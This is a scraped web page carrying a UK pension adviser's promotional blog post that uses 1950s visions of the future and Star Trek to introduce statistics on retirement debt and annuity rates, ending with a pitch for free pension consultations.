href=\"../from-the-kitchen-table-to-the-wealth-management-marketplace-our-20-year-story/\" rel=\"next\">Next</a>		</div>&#13;\n						<div id=\"post-5406\" class=\"post-5406 post type-post status-publish format-standard hentry category-wealth-management post\">&#13;\n									<div class=\"post-content\">&#13;\n				<p style=\"text-align: justify;\"><b><a href=\"../wp-content/uploads/2013/06/final-frontier.jpg\"><img class=\"size-full wp-image-5411 alignleft\" alt=\"final frontier\" src=\"../wp-content/uploads/2013/06/final-frontier.jpg\" width=\"306\" height=\"200\"/></a>I<span style=\"font-size: medium;\">n 1950, all eyes were turned excitedly towards the future. </span></b><span style=\"font-size: medium;\"><i>The New York Times</i> ran a feature filled with optimism, looking at all the great technological advances we could expect in tomorrow’s world.</span></p>&#13;\n<p style=\"text-align: justify;\">The year 2000 and beyond would bring great leaps forward, all designed to make life better and more comfortable.</p>&#13;\n<p style=\"text-align: justify;\">The vision began well enough. It pictured a thriving metropolis surrounded by an airport, factories and hotels. Beyond the town lay the leafy suburbs, apartments, houses, parks and playgrounds.</p>&#13;\n<p style=\"text-align: justify;\">In this world, solar and atomic power are used to create the energy needed to heat the homes, atomic-driven liners cruise the oceans and cars drive on double-decker highways.</p>&#13;\n<p style=\"text-align: justify;\">With the more efficient lower deck reserved for business traffic.</p>&#13;\n<p style=\"text-align: justify;\">Naturally.</p>&#13;\n<p style=\"text-align: justify;\">However, it’s the little knick-knacks of daily life that provide the most amusement and go to show that predicting the future is no simple task.</p>&#13;\n<p style=\"text-align: justify;\">A TV set combined with the radio and telephone which allow for video conferencing and shopping has to make do for Skype and the internet.</p>&#13;\n<p style=\"text-align: justify;\">Not a bad try, I suppose.</p>&#13;\n<p style=\"text-align: justify;\">And once the housewife has bought new clothes on her TV, she can head into her futuristic kitchen to prepare a cake with a difference…</p>&#13;\n<p style=\"text-align: justify;\">For in 1950, it was predicted that sugary foods would be made from recycled sawdust shavings and wood pulp. Now, it would be uncharitable of me to suggest that my local bakery probably employs those methods today, but anyway.</p>&#13;\n<p style=\"text-align: justify;\">Speaking of shaving, razors are a thing of the past in the 1950 vision of tomorrow, as pesky whiskers are literally rubbed away thanks to the application of male grooming chemicals.</p>&#13;\n<p style=\"text-align: justify;\">Classy.</p>&#13;\n<p style=\"text-align: justify;\">Of course, we’re just as eager to look ahead and imagine what things might be like in another 50 years from now. With the speed at which technology develops today, how different will the world of 2083 be in comparison to ours?</p>&#13;\n<p style=\"text-align: justify;\">The classic American TV series <i>Star Trek</i> has always thrived on that curiosity, and has thrown some great suggestions our way. But for a show based in the 23<sup>rd</sup> Century, it’s hard not to look upon their flip-open communicators in <i>Into Darkness,</i> (the latest film in the franchise) and think that they look a little Motorola circa 2003.</p>&#13;\n<p style=\"text-align: justify;\">Surely we won’t even be holding devices by then?</p>&#13;\n<p style=\"text-align: justify;\">Perhaps we’ll be able to link into an invisible network merely by thinking ourselves there, thanks to implants in our head. Or maybe a click of our fingers will be all we need to teleport ourselves to the office in person, our molecules reassembling themselves in a conference room miles away, ready to begin the meeting.</p>&#13;\n<p style=\"text-align: justify;\">Who can say…?</p>&#13;\n<p style=\"text-align: justify;\">What is for sure is that you need to prepare for the future, no matter how unpredictable and far-away it may seem. And right now, some things are substantially different to how they were foreseen back in 1950.</p>&#13;\n<p style=\"text-align: justify;\"><b>Take a look at the following. Not science fiction – but startling financial FACT.</b><b/></p>&#13;\n<div class=\"simple-grey-box\" style=\"width: 70%; margin: 5px auto 20px;\">&#13;\n<p><span style=\"text-align: justify;\">A </span><b style=\"text-align: justify;\">quarter</b><span style=\"text-align: justify;\"> of people living today are likely to reach the age of </span><b style=\"text-align: justify;\">100</b><span style=\"text-align: justify;\"> (source: DWP) </span></p>&#13;\n<p><span style=\"text-align: justify;\">According to the Office for National Statistics, the number of people working past State pension age has </span><b style=\"text-align: justify;\">doubled</b><span style=\"text-align: justify;\"> in the past 20 years.</span></p>&#13;\n<p><span style=\"text-align: justify;\">More than </span><b style=\"text-align: justify;\">1.6 million</b><span style=\"text-align: justify;\"> retired people </span><b style=\"text-align: justify;\">still have a mortgage</b><span style=\"text-align: justify;\">. Annuity experts MGM Advantage estimates </span><b style=\"text-align: justify;\">95,0000</b><span style=\"text-align: justify;\"> retirees owe more than </span><b style=\"text-align: justify;\">£25,000</b><span style=\"text-align: justify;\"> and </span><b style=\"text-align: justify;\">151,000</b><span style=\"text-align: justify;\"> owe more than </span><b style=\"text-align: justify;\">£100,000</b><span style=\"text-align: justify;\">.</span></p>&#13;\n<p><span style=\"text-align: justify;\">Over the next 7 years </span><b style=\"text-align: justify;\">600,000</b><span style=\"text-align: justify;\"> interest-only mortgages are due to mature and the financial regulator expects almost half of these borrowers need more time to repay.</span></p>&#13;\n<p><b>One in 10</b> are forced to delay retirement, according to the Daily Telegraph 5/2/12.</p>&#13;\n<p>A combination of plummeting annuity rates and poor investment returns means thousands cannot afford to stop work.</p>&#13;\n<p>Twenty years ago a 65 year old man retiring with a <b>£100,000</b> pension fund would have been able to secure a guaranteed income of over <b>£15,000</b> a year. Today, with annuity rates at less than 6pc, the same pension fund buys less than <b>£6,000</b> a year.</p>&#13;\n</div>&#13;\n<p> </p>&#13;\n<p style=\"text-align: justify;\"><b>This wasn’t the comfortable and easier way of living that people hoped for.</b> Why is it happening? And what can you do now to avoid finding yourself in the same position in the future?</p>&#13;\n<p style=\"text-align: justify;\">Well – it’s all down to a number of factors.</p>&#13;\n<p style=\"text-align: justify;\">One of the major contributors is the fact that <b>we are now living longer</b>.</p>&#13;\n<p style=\"text-align: justify;\">Advances in medical science, improvements in lifestyle, diet and general living conditions have combined to give us all greater longevity.</p>&#13;\n<p style=\"text-align: justify;\">And of course the longer we live, the further our pension pots need to stretch.</p>&#13;\n<p style=\"text-align: justify;\">This all sounds very bleak on the surface.</p>&#13;\n<p style=\"text-align: justify;\">It needn’t be that way though. By speaking to <b>Equity SMART</b> we can plan ahead together to ensure that you don’t retire in the red and can enjoy bright and prosperous times instead – a future every bit as relaxing and enjoyable as the New York Times predicted in 1950.</p>&#13;\n<p style=\"text-align: justify;\">Just maybe without the recycled sawdust cake.</p>&#13;\n<p style=\"text-align: justify;\">We’re <b>independent pension specialists</b> and put our clients and their interests first in everything that we do. Contact us today for a free consultation. We’ll take a look at your current <b>pension plan</b> and work out the best way forward to ensure that your finances work for you, your family and your future.</p>&#13;\n<p style=\"text-align: justify;\">Take a look at our <b>pension and retirement planning</b> options here.<a href=\"../pensions/\">http://www.equalitywalk.org.uk/pensions/</a> <b> </b></p>&#13;\n<p style=\"text-align: justify;\">Or, keep a beady eye out for our <b>Retirement Awareness Campaign</b>. We’ll be putting out a series of articles that will tell you all about real, tangible solutions to retirement finance and how best to <b>manage your pensions</b> and <b>plan for the future</b>.</p>&#13;\n<p style=\"text-align: justify;\">We’re not about the hard sell. We’re all about doing things right – for you.</p>&#13;\n<p style=\"text-align: justify;\"><b>Equity SMART. Welcome to the Future of Finance.</b></p>&#13;\n<p style=\"text-align: justify;\"><br/>&#13;\nStrategic Development Director</p>&#13;\n<p style=\"text-align: justify;\">&#13;\n							</p></div>&#13;\n						<div class=\"meta-info\">&#13;\n				<div class=\"alignleft\">&#13;\n					<span class=\"vcard author\">By <a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span><span class=\"sep\">|</span>June 21st, 2017<span class=\"sep\">|</span><a href=\"../category/wealth-management/\" title=\"View all posts in Wealth Management\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><a href=\"../retirement-income-the-final-frontier/\" title=\"Comment on Retirement Income. The Final Frontier.\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n									<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?u=http://www.equalitywalk.org.uk/retirement-income-the-final-frontier/&amp;t=Retirement%20Income.%20The%20Final%20Frontier.\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=Retirement%20Income.%20The%20Final%20Frontier.%20http://www.equalitywalk.org.uk/retirement-income-the-final-frontier/\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/retirement-income-the-final-frontier/&amp;title=Retirement%20Income.%20The%20Final%20Frontier.\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n																									<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/retirement-income-the-final-frontier/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n																				<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=Retirement Income. The Final Frontier.&amp;body=http://www.equalitywalk.org.uk/retirement-income-the-final-frontier/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n						&#13;\n												<div class=\"related-posts single-related-posts\">&#13;\n				<div class=\"title\"><h2>Related Posts</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div id=\"carousel\" class=\"es-carousel-wrapper\">&#13;\n					<div class=\"es-carousel\">&#13;\n						<ul><li>&#13;\n								<div class=\"image\">&#13;\n																																																		<div class=\"image-extras\">&#13;\n											<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"../what-does-a-wealth-managerdo/\">Permalink</a>&#13;\n														<a style=\"display:inline-block;\" class=\"icon gallery-icon\" href=\"../wp-content/uploads/2013/08/wealth3.jpg\" rel=\"prettyPhoto[gallery]\">Gallery</a>&#13;\n												<p>What Does a Wealth Manager Do?</p>&#13;\n											</div>&#13;\n										</div>&#13;\n								</div>&#13;\n							</li>&#13;\n																					<li>&#13;\n								<div class=\"image\">&#13;\n																																																		<div class=\"image-extras\">&#13;\n											<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"../pension-liberation-good-plan-or-bad-scam/\">Permalink</a>&#13;\n														<a style=\"display:inline-block;\" class=\"icon gallery-icon\" href=\"../wp-content/uploads/2013/07/scams.gif\" rel=\"prettyPhoto[gallery]\">Gallery</a>&#13;\n												<p>Pension Liberation – Good plan or bad scam?</p>&#13;\n											</div>&#13;\n										</div>&#13;\n								</div>&#13;\n							</li>&#13;\n																					<li>&#13;\n								<div class=\"image\">&#13;\n																																																		<div class=\"image-extras\">&#13;\n											<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"../from-the-kitchen-table-to-the-wealth-management-marketplace-our-20-year-story/\">Permalink</a>&#13;\n														<a style=\"display:inline-block;\" class=\"icon gallery-icon\" href=\"../wp-content/uploads/2013/07/Our-Story.jpg\" rel=\"prettyPhoto[gallery]\">Gallery</a>&#13;\n												<p>From the Kitchen Table to the Wealth Management Marketplace – A 20 Year Story</p>&#13;\n											</div>&#13;\n										</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n					<div class=\"es-nav\"><span class=\"es-nav-prev\">Previous</span><span class=\"es-nav-next\">Next</span></div>&#13;\n				</div>&#13;\n			</div>&#13;\n						&#13;\n												&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n<div id=\"respond\" class=\"section\">&#13;\n	<div>&#13;\n	<div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n	<div>&#13;\n&#13;\n	<div><p class=\"cancel-comment-reply\"><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../retirement-income-the-final-frontier/\" style=\"display:none;\">Click here to cancel reply.</a></p></div>&#13;\n&#13;\n	&#13;\n	&#13;\n&#13;\n		&#13;\n		<div id=\"comment-input\">&#13;\n&#13;\n			&#13;\n&#13;\n			&#13;\n		&#13;\n			&#13;\n			&#13;\n		</div>&#13;\n		&#13;\n		<div id=\"comment-textarea\">&#13;\n			&#13;\n			&#13;\n		&#13;\n		</div>&#13;\n		&#13;\n		<div id=\"comment-submit\">&#13;\n		&#13;\n			<p/>&#13;\n			<input type=\"hidden\" name=\"comment_post_ID\" value=\"5406\" id=\"comment_post_ID\"/><p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"d8fc3a4445\"/></p>			&#13;\n		</div>&#13;\n&#13;\n		&#13;\n	&#13;\n&#13;\n		</div>&#13;\n	</div>&#13;\n</div>&#13;\n&#13;\n					</div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"float:right;\">&#13;\n	<div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"/\" title=\"A Guide To Investment – Different Ways To Grow &amp; Protect Your Wealth\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/a-guide-to-protection-planning/\" title=\"A Guide To Protection Planning\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/a-guide-to-annuities/\" title=\"A Guide To Annuities\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../will-you-avoid-care-home-costs/\">&#13;\n										<img width=\"52\" height=\"34\" src=\"../wp-content/uploads/2013/02/photodune-2677721-big-ben-s2-e1361782596271.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"goverment report on care home costs uk\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../will-you-avoid-care-home-costs/\">Will You Avoid Care Home Costs?</a>&#13;\n									<div class=\"meta\">&#13;\n										February 23rd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../7-pension-release-rules/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../7-pension-release-rules/\">7 Pension Release Rules to consider – so YOU don’t lose out.</a>&#13;\n									<div class=\"meta\">&#13;\n										August 29th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../pension-liberation-good-plan-or-bad-scam/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../pension-liberation-good-plan-or-bad-scam/\">Pension Liberation – Good plan or bad scam?</a>&#13;\n									<div class=\"meta\">&#13;\n										July 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../from-the-kitchen-table-to-the-wealth-management-marketplace-our-20-year-story/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../from-the-kitchen-table-to-the-wealth-management-marketplace-our-20-year-story/\">From the Kitchen Table to the Wealth Management Marketplace – A 20 Year Story</a>&#13;\n									<div class=\"meta\">&#13;\n										July 2nd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../retirement-income-the-final-frontier/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../retirement-income-the-final-frontier/\">Retirement Income. The Final Frontier.</a>&#13;\n									<div class=\"meta\">&#13;\n										June 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (2)</option><option class=\"level-0\" value=\"4\">Pensions  (3)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"1\">Wealth Management  (4)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"../feed/\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul></div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n			<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"../what-does-a-wealth-managerdo/\" title=\"What Does a Wealth Manager Do?\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../7-pension-release-rules/\" title=\"7 Pension Release Rules to consider – so YOU don’t lose out.\">7 Pension Release Rules to consider – so YOU don’t lose out.</a>&#13;\n							<span class=\"post-date\">August 29, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../pension-liberation-good-plan-or-bad-scam/\" title=\"Pension Liberation – Good plan or bad scam?\">Pension Liberation – Good plan or bad scam?</a>&#13;\n							<span class=\"post-date\">July 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../from-the-kitchen-table-to-the-wealth-management-marketplace-our-20-year-story/\" title=\"From the Kitchen Table to the Wealth Management Marketplace – A 20 Year Story\">From the Kitchen Table to the Wealth Management Marketplace – A 20 Year Story</a>&#13;\n							<span class=\"post-date\">July 2, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../retirement-income-the-final-frontier/\" title=\"Retirement Income. The Final Frontier.\">Retirement Income. The Final Frontier.</a>&#13;\n							<span class=\"post-date\">June 21, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">enquiries@equalitywalk.org.uk</a></p>&#13;\n		&#13;\n				&#13;\n				<div style=\"clear:both;\"/></div><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"../feed/\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n			&#13;\n<script><![CDATA[\r\njQuery(document).ready(function(){\r\n	jQuery(\".footer-nav a:last-child\").css(\'border-right\', \'none\');\r\n\r\n});\r\n]]></script><script type=\"text/javascript\"><![CDATA[\r\njQuery(document).ready(function(){\r\n	jQuery(\'.opl-widget-btn\').each(function(){\r\n		var $this = jQuery(this);\r\n		$this.click(function(e){\r\n			document.getElementById(\'opl-widget-submit\').submit();\r\n		});\r\n	});\r\n});\r\n]]></script><script><![CDATA[\r\n	jQuery(document).ready(function($){\r\n		var opl_topnav_w = $(\'#opl-top-nav\').outerWidth() + 20;\r\n		$(\'#opl-top-nav\').css({\r\n			\'width\' : opl_topnav_w + \'px\',\r\n		});\r\n	});\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-packed.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/imagesLoaded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.isotope.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.cycle.lite.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.hoverIntent.minified.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.eislideshow.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/froogaloop.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.placeholder.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.waypoint.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gauge.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.ddslick.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.infinitescroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/></body>','Retirement Income. The Final Frontier.','Read 